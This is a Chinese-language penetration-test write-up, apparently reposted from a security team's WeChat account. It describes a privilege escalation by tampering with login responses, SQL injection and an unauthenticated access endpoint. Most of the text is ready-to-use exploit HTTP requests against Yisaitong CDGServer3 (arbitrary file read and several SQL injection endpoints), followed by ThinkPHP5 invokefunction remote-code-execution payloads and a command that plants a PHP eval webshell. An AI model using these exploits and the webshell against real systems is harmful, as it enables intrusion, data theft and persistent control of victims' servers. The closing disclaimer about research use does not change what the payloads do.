垂直越权
可以发现前端登录存在两种模式,管理员与用户还有注册用户,这个时候我们可以先注册用户进去看看是什么样子的。
这是我注册的普通用户,里面没有管理员权限的功能。
这里我随便输入了一个错误的管理员账号密码,我的思路是先抓取我注册的用户,登录成功的响应包再进行替换错误的管理员返回的响应包,直接放行就能登录进去。
这个是我注册的用户登录成功的响应包,这里进行复制保留,然后再登录错误的管理员账户,将我登录成功的响应数据替换到管理员响应包里即可。
这样就进来了,在后台查询用户接口中其实还存在 sql 注入。
SQL注入
可以发现重发修改 sort=' 的时候直接爆出 sql 语句错误,说明这个参数存在 sql 注入。
直接上 sqlmap 一把梭。
未授权访问
前端接口暴露,存在未经授权,可获取到大量个人敏感信息,包括个人姓名、手机号地址等等。
访问将设置登录状态:http://xxx.xxx.xxx/permission/loginByOutside
再访问主页就登录成功了。
亿赛通系统
打一波nday
ViewUploadFile任意文件读取
GET /CDGServer3/client/;login;/DecryptApplication?command=ViewUploadFile&filePath=C:/Windows/System32/drivers/etc/hosts&uploadFileId=1&fileName1=hosts HTTP/1.1
Host: xxx.xxx.xxx
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: zh-CN,zh;q=0.9
Cookie: JSESSIONID=5BEE0014C9CD691F3177A3194EB06C3F
Upgrade-Insecure-Requests: 1
Accept-Encoding: gzip, deflate
create SmartSec信息泄露
https://xxx.xxx.xxx/CDGServer3/SQL/MYSQL/create_SmartSec_mysql.sql
UploadFileToCatalog SQL注入
POST /CDGServer3/js/../policy/UploadFileToCatalog?fromurl=../user/dataSearch.jsp HTTP/1.1
Host: xxx.xxx.xxx
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Content-Length: 15
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
id=1
FileFormatAjax SQL注入
POST /CDGServer3/PerOrgServlet/../FileFormatAjax HTTP/1.1
Host: xxx.xxx.xxx
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Content-Length: 15
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
command=delFileFormat&fileFormatId=12
SaveCDGPermissionFromGFOA SQL注入
POST /CDGServer3/js/../SaveCDGPermissionFromGFOA HTTP/1.1
Host: xxx.xxx.xxx
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Content-Length: 15
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
fileId=1
PolicyAjax 前台SQL注入
POST /CDGServer3/dojojs/../PolicyAjax HTTP/1.1
Host: xxx.xxx.xxx
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Content-Length: 15
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
command=selectOption&id=1HookInvalidCourse SQL注入
POST /CDGServer3/system/HookInvalidCourse;loginService HTTP/1.1
Host: xxx.xxx.xxx
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Content-Length: 15
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
command=DelHookInvalidCourse&id=1内网资产收集
开始工作,我用 Goby 对内网进行资产探测,网段比较大,例子也比较形象,就单个作为文章的记录了。
弱口令
逮到几个弱口令,内网中弱口令最多了,记得上次有 10 多个弱口令。。
Thinkphp5 RCE命令执行
看图片识框架,这不是 Thinkphp 吗,果断用工具跑一遍payload。
果不其然存在 RCE 命令执行,直接上 payload 看看。
/?s=index/thinkapp/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1
?s=index/thinkapp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami
运气还不错,歪打正着,看看是个什么权限,是 system 耶,emm... 很棒!
文件包含
?s=index/thinkLang/load&file=C:windowswrite.exe
写小马
?s=index/thinkapp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo ^<?php eval($_POST['cmd']); > 1.php
哈哈哈,直接写个 shell 用蚁剑连接上,好了点到为止。懒得哔哔 : )
本文作者:发光的神原文地址:https://meta.natapp4.cc/index.php/archives/1697/
原文始发于微信公众号(刨洞安全团队):记一次内外网牛马渗透测试
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论